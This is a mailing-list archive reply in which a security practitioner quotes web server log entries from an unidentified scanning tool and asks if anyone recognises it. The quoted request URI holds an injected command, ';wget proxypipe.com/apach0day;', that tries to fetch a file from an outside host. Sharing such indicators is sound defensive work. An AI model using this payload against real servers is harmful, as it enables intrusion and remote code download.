PaulDotCom mailing list archives
Re: [Security Weekly] apache chroot 0day?
From: Sander Demeester <demeester.sander () gmail com>
Date: Mon, 28 Jul 2014 07:18:01 -0700
This is not looking that good? Lets do some testing... 2014-07-28 2:09 GMT-07:00 Robin Wood <robin@digi.ninja>:
I've got a site that was scanned this morning by a tool that left these
entries in the logs:
[HTTP_USER_AGENT] => chroot-apach0day
[HTTP_REFERRER] => /xA/x0a/x05
[REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%
20proxypipe.com/apach0day;
Anyone recognise it? That user agent isn't coming up in google searches.
Robin
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
_______________________________________________ Pauldotcom mailing list Pauldotcom () mail securityweekly com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Sander Demeester (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Frank Michael (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Chris Campbell (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 28)
- Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
- Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 28)